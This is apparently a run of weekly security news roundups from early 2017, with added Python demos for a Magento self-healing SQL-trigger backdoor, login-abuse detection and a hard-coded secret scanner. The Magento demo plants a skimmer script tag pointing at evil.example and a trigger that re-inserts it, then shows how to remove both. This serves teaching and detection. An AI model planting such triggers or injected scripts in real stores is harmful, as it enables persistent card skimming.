Security Roundup - 2017-02-23

I am sure no one missed the death knell of SHA-1 as a security hash today: Google has announced a practical SHA-1 collision. The attack code is to be released in 90 days, giving the stragglers who still haven't migrated, despite warnings from Google over the last several years, a final window to do so. The attack is reportedly about 100,000 times faster than a brute-force search for a SHA-1 collision, so it is only a matter of time before it gets cheaper still.

RSA wrapped up last week, and Brian Krebs reports on an overlooked announcement with big impact. Researchers at RSA disclosed a breach at a company selling log management tools: its update server was compromised for two weeks in 2015, and clients automatically downloaded a trojanized version of the software. RSA investigators discovered this during a 2016 incident investigation and believe a number of organizations may still be compromised.

A frightening new persistent threat called 'Operation BugDrop' was uncovered this week. The malware takes control of the infected machine's microphone and uploads the recorded audio elsewhere. So far more than 70 targets across a variety of industries have been identified, most of them located in Ukraine.

PhishLabs has released its 2017 Phishing Trends Report. Highlights include: one million confirmed malicious phishing sites in 2016, 7,800 phishing attacks investigated and/or mitigated by PhishLabs every month, and an average 33% year-over-year growth in attacks against the top five targeted industries. They expect cloud storage services to be the number one target by the end of the year, supplanting the financial industry, which is actually showing a decline. Finally, phishing attacks impersonating the IRS in 2016 outnumbered all of those seen in 2015 combined. With tax season underway, be wary!

This week Australia expanded its breach notification policy, while Canada is preparing new legislation requiring prompt breach notifications.

Chrome extensions can do fairly powerful things, and Malwarebytes covers how one malicious extension abuses the current extension APIs to make itself extremely hard for the average user to uninstall. The extension in question drives a tech support scam and also connects to a C2 server, from which it can potentially fetch and execute other code.

BleepingComputer has a nice rundown of Ramnit's return after the 2015 takedown attempt. Unfortunately, as of 2017 it is back in the top five active banking trojans.

Netflix released a project this week focused on 'user focused security'. Called 'Stethoscope', the tool lets users visit a website that gathers some information about their device and gives them actionable recommendations and education in return.

Dropbox also released a security-focused project this week: SecurityBot. SecurityBot is a chatbot that speeds up incident detection and resolution by automatically asking users to verify certain actions (such as running sudo on a machine where they are not expected to have that permission), and escalating to the security team quickly if the user indicates they did NOT perform the action. This lets Dropbox security clear false positives quickly, without requiring the team to manually follow up on each signal, and without ignoring certain signals just because some individuals generate a high rate of false positives.

In ransomware, BleepingComputer covers a new ransomware family being reverse engineered live. The ransomware in question, Hermes, used a randomization seed that could be attacked to build a decryptor for the malware.

Things to watch:

Wired reports on a newly disclosed attack that allows attackers to circumvent the memory randomization (ASLR) used by modern operating systems. The attack runs from JavaScript in the browser and relies on measuring the timing of memory operations to infer where a program's memory is laid out, which lets an attacker carry out subsequent memory corruption exploits with far greater certainty.

Security Roundup - 2017-02-15

RSA is happening this week, and some interesting things are coming out of it. The most interesting to me so far is Google's talk on BeyondCorp, its six-year effort to let employees work from untrusted networks without a VPN. Rather than relying on a VPN, BeyondCorp evaluates over a dozen signals about the user and device to decide whether to grant that user access to a specific resource, allowing dynamic policies rather than static ones.

As a companion piece to the above, O'Reilly posts a conversation with an SRE at Stripe on zero trust networks.

Sucuri has released its monthly lab notes, and there are some interesting gems. First is a note on bad actors disguising malicious scripts as image files to evade casual inspection of logs and traffic. Second, they cover some techniques malicious actors use to spread backdoors and other malware across shared hosts, expanding their reach quickly because one poorly secured neighbor exposes everyone on the box.

Brian Krebs follows up on the LeakedSource takedown, by assembling some clues on who might have been behind the site.

A self-healing malware strain has been found on Magento stores. It installs SQL triggers that check whether the malicious code has been cleaned up and, if so, re-insert it.
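To show why deleting the injected rows is not enough, here is an added example (not Sucuri's or Magento's code) that reproduces the trigger trick in an in-memory SQLite database standing in for Magento's MySQL schema. The table name, trigger name and the skimmer payload are invented for illustration; the hunt query at the end is the equivalent of reading `information_schema.TRIGGERS` in MySQL.

```python
"""Self-healing database backdoor via SQL triggers, and how to hunt for it.

Added example, not Sucuri's or Magento's code. Uses an in-memory SQLite
database as a stand-in for Magento's MySQL schema; the table name,
trigger name and payload are invented for illustration.
"""
import sqlite3

# Constructed stand-in for an injected skimmer snippet.
PAYLOAD = '<script src="https://evil.example/skim.js"></script>'


def open_store():
    """Create a toy config table with one legitimate row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE core_config_data (path TEXT PRIMARY KEY, value TEXT)")
    conn.execute("INSERT INTO core_config_data VALUES ('design/footer/copyright', 'Example Store')")
    conn.commit()
    return conn


def infect(conn):
    """What the malware does: plant the payload AND a trigger (hypothetical
    name 'heal_after_delete') that re-plants it whenever the row is deleted."""
    conn.execute("INSERT INTO core_config_data VALUES ('design/head/includes', ?)", (PAYLOAD,))
    conn.execute(f"""
        CREATE TRIGGER IF NOT EXISTS heal_after_delete
        AFTER DELETE ON core_config_data
        WHEN OLD.path = 'design/head/includes'
        BEGIN
            INSERT INTO core_config_data VALUES ('design/head/includes', '{PAYLOAD}');
        END
    """)
    conn.commit()


def naive_cleanup(conn):
    """What an admin typically does: delete the injected row and move on."""
    conn.execute("DELETE FROM core_config_data WHERE path = 'design/head/includes'")
    conn.commit()


def is_infected(conn):
    row = conn.execute(
        "SELECT value FROM core_config_data WHERE path = 'design/head/includes'"
    ).fetchone()
    return row is not None and PAYLOAD in row[0]


def list_triggers(conn):
    """Hunt query. MySQL equivalent:
    SELECT TRIGGER_NAME, EVENT_OBJECT_TABLE, ACTION_STATEMENT FROM information_schema.TRIGGERS;
    SQLite keeps the same information in sqlite_master."""
    return list(conn.execute(
        "SELECT name, tbl_name, sql FROM sqlite_master WHERE type = 'trigger'"
    ))


def suspicious_triggers(conn, indicators=("<script", "eval(", "base64")):
    """Flag triggers whose body references web content or obfuscation: a
    store's schema has no business writing HTML from inside a trigger."""
    return [t for t in list_triggers(conn) if any(i in t[2].lower() for i in indicators)]


def thorough_cleanup(conn):
    """Drop the self-healing trigger first, then delete the row."""
    for name, _tbl, _sql in suspicious_triggers(conn):
        conn.execute(f'DROP TRIGGER "{name}"')
    naive_cleanup(conn)


def demo():
    """Returns (healed_after_naive_cleanup, flagged_trigger_names, clean_after_thorough_cleanup)."""
    conn = open_store()
    infect(conn)
    naive_cleanup(conn)
    healed = is_infected(conn)          # True: the trigger put the row back
    found = [t[0] for t in suspicious_triggers(conn)]
    thorough_cleanup(conn)
    return healed, found, not is_infected(conn)


if __name__ == "__main__":
    print(demo())
```

The point of the exercise is that the cleanup has to enumerate and remove triggers (and, on a real store, stored procedures and scheduled events) before touching the data; deleting rows alone just fires the malware's own restore hook.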

Another bad news day for Yahoo, as it announces that some accounts may have been accessed without a password in 2015 or 2016, using forged cookies generated with a tool internal to Yahoo.

Following last week's WordPress REST API flaw, up to 1.5 million WordPress sites have reportedly been defaced, despite automatic background updates that patched a percentage of sites and additional security plugins intended to mitigate the problem. More than a dozen distinct defacement campaigns have been detected as of this writing.

This week I learned that some ransomware is delivered via brute-force RDP attacks: the attacker breaks into machines through exposed remote desktop services and deploys the malware by hand. Sadly, this method appears to be on the rise.

Akamai has released its Q4 State of the Internet report this week. Overall DDoS attacks were down quarter over quarter, which they attribute to the various botnets fighting over the same pool of devices rather than performing actual attacks. Web application attacks, however, were up quarter over quarter, with SQLi growing the most. Unsurprisingly, they expect IoT botnets to increase in the near future.

Speaking of the Internet of Things, BleepingComputer posts an interesting story in which smart devices at a university were hijacked and the resulting botnet accidentally overwhelmed the campus network with traffic. To the university's credit, the smart devices were segregated on a separate network, which kept the infection from spreading beyond that segment.

SophosLabs has released its Malware Forecast report. Unsurprisingly, IoT devices are ALSO at the top of this list. Also highlighted: Android and macOS malware are both on the rise.

Finally, Talos Intel has an analysis of the AthenaGo malware strain. This malware is interesting for a few reasons. The first is the language (Go), which is not commonly used for malware. The second is its use of Tor2Web proxies to reach C2 nodes hosted on Tor without having to install Tor on the infected machine. This gives the attacker some additional anonymity, though it also makes the traffic blockable at the proxy level.

Security Roundup - 2017-02-09

Kaspersky details a sophisticated malware attack in which the attackers used a variety of freely available tools to load programs directly into memory and grant themselves remote access. This helped them hide their identity and made their activity harder to detect. Kaspersky says this is becoming more common, making memory forensics something to consider.

For some more benign hacks due to devices exposed to the internet with default passwords:

IP audio streamers used by radio stations were compromised to play a specific song for 15 minutes. Rapid7 did some extra digging and provides details.

One prankster caused a number of printers to print out messages telling users that their device was part of a botnet.

A few unauthenticated API vulnerabilities were also disclosed this week:

The first is in McAfee ePolicy Orchestrator, and would allow an attacker to dump information from the server, or to impersonate a client in order to retrieve information about that client.

Honeywell SCADA controllers had a number of bugs that allowed an attacker to retrieve a password in plain text and then use it to log in.

Sophos reports on a subtle bug in the new WordPress REST API that allowed an unauthenticated user to modify any blog post. The vulnerability has been patched, but once word got out plenty of WordPress instances were defaced.

In other news:

HTTPS hits a big milestone: more than 50% of user traffic (according to Firefox telemetry) is now encrypted. This is in large part due to more of the large players encrypting all of their traffic by default, but it indicates that HTTPS-only is becoming the norm rather than the exception.

Etsy has an in-depth article on the many steps they take to keep the private TLS certificates they use secure, which is interesting reading for any system where you need to keep information particularly secure.

Ars Technica has an article on how Google took on Mirai by admitting krebsonsecurity.com to Project Shield. The article gives some additional insight into the sorts of attacks they saw once Google took over hosting.

Meanwhile, Mirai apparently received an update and now targets Windows! Infected Windows machines are used to brute-force passwords on other systems and spread the botnet. Part of the code also breaks into databases, presumably to steal information.

Following the success of bug bounty programs for public companies, reports indicate that some dark net markets are doing the same.

Check Point reports seeing a resurgence of SQL Slammer, the worm that was primarily active in 2003 and has been largely dormant since.

Security Roundup - 2017-02-02

Think last year was a bad year for modems? A security researcher from Trustwave details how he found a bug in his own router that turned out to affect 31 different Netgear models. Sadly, part of his research involved finding two publicly disclosed exploits for similar flaws from 2014 and expanding on that work. Netgear responded to the responsible disclosure and has issued patches for the affected devices.

Trustwave also increased my knowledge of SVG this week with an article on how SVG files can contain JavaScript and so be used to execute remote payloads.

In more device security news, Threatpost reports on a printer flaw that allows an attacker to remotely extract information, including documents and credentials. The researchers achieved this using a combination of "cross-site printing" and CORS spoofing to make a user's browser act as a relay that exfiltrates the data.

Akamai has been researching credential abuse, specifically scenarios where a botnet works to stay below standard security controls. In these scenarios an individual website is unlikely to detect the behavior, since volumes are low and attempts are spread across IPs, accounts and time. Viewed in aggregate across the many sites Akamai protects, however, the same sources and targets stand out, and Akamai was able to detect these attacks far more readily than single-site observation would allow.
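The contrast between the per-site view and the aggregate view, as an added example that is not Akamai's detection logic (it also covers the brute-force RDP item in the 2017-02-15 roundup above). Two rules run over constructed login events: a per-site windowed failure count, which catches a loud brute force against one host, and a cross-site count of distinct targets per source IP, which catches a low-and-slow campaign that never trips the first rule on any single site. Site names, addresses and thresholds are invented for illustration.

```python
"""Per-site brute-force detection vs aggregate low-and-slow detection.

Added example, not Akamai's code. Events are (timestamp, site, source_ip,
username, success) tuples; all sample data below is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _t(minutes):
    """Constructed timestamps: minutes after 2017-02-01 00:00."""
    return datetime(2017, 2, 1) + timedelta(minutes=minutes)


EVENTS = []
# Loud brute force (RDP style): one IP, one site, 30 failures in 3 minutes.
EVENTS += [(_t(i // 10), "siteA", "203.0.113.9", f"user{i}", False) for i in range(30)]
# Low and slow: one IP, 20 sites, 3 failures each, spread over a day.
for s in range(20):
    for k in range(3):
        EVENTS.append((_t(s * 70 + k * 23), f"shop{s:02d}", "198.51.100.7", "admin", False))
# Legitimate noise: a user mistypes once, then succeeds.
EVENTS += [(_t(5), "siteA", "192.0.2.44", "alice", False),
           (_t(6), "siteA", "192.0.2.44", "alice", True)]


def brute_force_per_site(events, threshold=10, window=timedelta(minutes=5)):
    """What one site can see on its own: flag (site, ip) pairs with at least
    `threshold` failures inside any sliding `window`."""
    failures = defaultdict(list)
    for ts, site, ip, _user, ok in events:
        if not ok:
            failures[(site, ip)].append(ts)
    hits = set()
    for key, times in failures.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:   # shrink window from the left
                lo += 1
            if hi - lo + 1 >= threshold:
                hits.add(key)
                break
    return hits


def low_and_slow_aggregate(events, min_sites=10, per_site_max=5):
    """What only the aggregate view can see: IPs that fail on many distinct
    sites while staying at or under `per_site_max` failures at each one,
    i.e. exactly the traffic rule 1 cannot flag anywhere."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for _ts, site, ip, _user, ok in events:
        if not ok:
            per_ip[ip][site] += 1
    return {
        ip for ip, sites in per_ip.items()
        if len(sites) >= min_sites and max(sites.values()) <= per_site_max
    }


if __name__ == "__main__":
    print("per-site brute force:", brute_force_per_site(EVENTS))
    print("aggregate low-and-slow:", low_and_slow_aggregate(EVENTS))
```

Neither rule alone is enough: the first misses 198.51.100.7 entirely, and the second deliberately excludes the noisy attacker so the two alerts carry different context (lock out and rate-limit one source locally; share the other as an indicator across tenants).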

LeakedSource, a website that obtained breach data and openly sold access to it, was taken down this week. Troy Hunt, who runs Have I Been Pwned, provides his thoughts on the service and the takedown. Troy is critical of the LeakedSource model, under which anyone could pay and get personal details from leaks. He points out a number of instances where this information has clearly been used maliciously (in OurMine-style account takeovers), and suggests that LeakedSource also incentivized attackers to find and turn up more data.

Google has announced that it will now operate its own root certificate authority, and has acquired two existing root CAs from GlobalSign. Among other things, this gives Google tighter control over who can issue 'official' Google certificates, since its products can verify that the entire certificate chain leads back to a Google-controlled root rather than trusting every existing public root CA. With CAs like StartCom issuing rogue certificates, and even well-known CAs like Symantec and GlobalSign having had certificate issues in the last year, it is understandable that a company like Google wants more control over the security of all its properties.

Ars has an interesting article suggesting that antivirus is making it harder to secure the browser. Several browser engineers point out cases where security protections were delayed or broke because antivirus products hook into the browser and in some cases disable functionality. A further observation, supported by a number of vulnerabilities last year, is that antivirus itself adds attack surface.

In ransomware, BleepingComputer provides two terrible infection stories. In one, a police department lost up to eight years of digital evidence; some of the data had backups, but the recent data likely did not. The second was a hotel where the infected computer was also used to program key cards for the electronic door locks. Since this only affected the issuing of new keys, no guests were actually impacted.

Want to learn more about the new Locky Bart versions? Malwarebytes does an in depth analysis of the inner operations.

Talos Intel recently analyzed a malicious attachment apparently aimed at government officials. They go into detail on the several layers the payload passes through in order to execute (a .doc file containing Flash, which runs ActionScript), as well as the methods it uses to avoid casual analysis.

For further in-depth malware analysis, Talos also dissects EyePyramid, a malware sample that had remained undetected for a few years.

Security Roundup - 2017-01-26

Some missed news from last month: an incident responder published a 2016 review of lessons learned from security breaches. Some high-level lessons:

  • Centralized logging makes problems much easier to track down.
  • Root causes might never be found.
  • If you rely heavily on third-party technology, evaluate it for risk.
  • Most organizations he visited did not have a good secrets management solution.
  • Companies with high tech debt tend to carry high security debt as well.

The EFF put out an update on technical developments in cryptography, covering backdoored crypto, progress toward finalizing TLS 1.3, a review of crypto attacks in 2016, and the strengthening of HTTPS.

Symantec-owned certificate authorities have been found to have violated certificate issuance guidelines for 108 certificates. Nine of these were issued to parties that did not control the domains in question. Many appear to be 'test' certificates and were promptly revoked, but they could still have been used maliciously, especially since browsers are generally unable to react to issuance and revocation of certificates in real time. These violations were apparently only discovered via Google's Certificate Transparency logs.

Hack The Army started up at the end of last year, and TechCrunch provides a story of some of the initial results.

Use Cisco WebEx? You might want to check that the browser extension is up to date, since older versions contain a remote code execution vulnerability that allows a computer to be taken over just by browsing to a specially crafted page. Sophos has a breakdown.

Engineers at recently built a tool to find secrets in Android apps. After analyzing 16K applications they wrote up some findings. Unsurprisingly, quite a few applications had some sort of API token hard-coded into the app.

has released an updated Heartbleed report, indicating that 200K servers are still susceptible to CVE-2014-0160 (yes, Heartbleed is now almost three years old).
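What such a scanner does at its core, as an added example (not the tool the article describes): match well-known public token formats, then fall back to a Shannon-entropy check for unlabelled high-entropy literals. The input is a constructed list of strings of the kind `strings` or apktool would pull out of an APK; the patterns cover AWS access key IDs, Google API keys, Slack bot/user tokens and PEM private-key headers, and the entropy threshold is a tunable assumption.

```python
"""Scan extracted app strings for hard-coded API tokens.

Added example, not the tool the article describes. SAMPLE_STRINGS is a
constructed stand-in for strings pulled out of a decompiled APK.
"""
import math
import re

# Public, well-known token formats.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "slack_token": re.compile(r"\bxox[abp]-[0-9A-Za-z-]{10,}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

# Long single-token literals made only of base64/hex/url-safe characters.
HIGH_ENTROPY_LITERAL = re.compile(r"^[0-9A-Za-z+/=_-]{32,}$")

# Constructed sample: a mix of harmless resource strings and planted secrets.
SAMPLE_STRINGS = [
    "res/layout/activity_main.xml",
    "https://api.example.com/v2/upload",
    "AKIAIOSFODNN7EXAMPLE",                       # AWS's documented example key id
    "AIzaSyD-EXAMPLEKEY" + "0" * 21,              # shaped like a Google API key
    "xoxb-123456789012-abcdefghijklmnop",         # shaped like a Slack bot token
    "Content-Type: application/json",
    "3f8a9c2b7d1e4f6a8b0c2d4e6f8a1b3c5d7e9f0a",  # unlabelled 40-hex literal
    "com.example.app.MainActivity",
]


def shannon_entropy(s):
    """Bits per character; ~4.0 for random hex, ~5.5+ for random base64,
    well under 3.5 for ordinary identifiers and words."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan(strings, entropy_threshold=3.5):
    """Return (finding_type, string) pairs. Known formats win over the entropy
    heuristic so a finding is labelled as precisely as possible."""
    findings = []
    for s in strings:
        for name, pattern in PATTERNS.items():
            if pattern.search(s):
                findings.append((name, s))
                break
        else:
            if HIGH_ENTROPY_LITERAL.match(s) and shannon_entropy(s) >= entropy_threshold:
                findings.append(("high_entropy_literal", s))
    return findings


if __name__ == "__main__":
    for kind, value in scan(SAMPLE_STRINGS):
        print(f"{kind:22} {value}")
```

The entropy fallback is what turns this from a grep into a scanner: it is what flags a vendor's bespoke 40-character token that no public pattern describes, at the cost of needing a human to confirm the hit. The proper fix on the app side is not to ship the secret at all, but to proxy privileged calls through a backend that holds the credential.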

BleepingComputer reports on a ransomware strain whose source code was leaked. Initial investigation indicates it has already been modified into a banking trojan.

Speaking of modified versions, Check Point warns of a new version of HummingBad, called HummingWhale. They have already contacted Google to take down a number of apps, and share their overall findings.

Finally, BleepingComputer details how members of the MalwareHuntingTeam are being harassed on VirusTotal, presumably by malware authors that MalwareHuntingTeam has exposed.
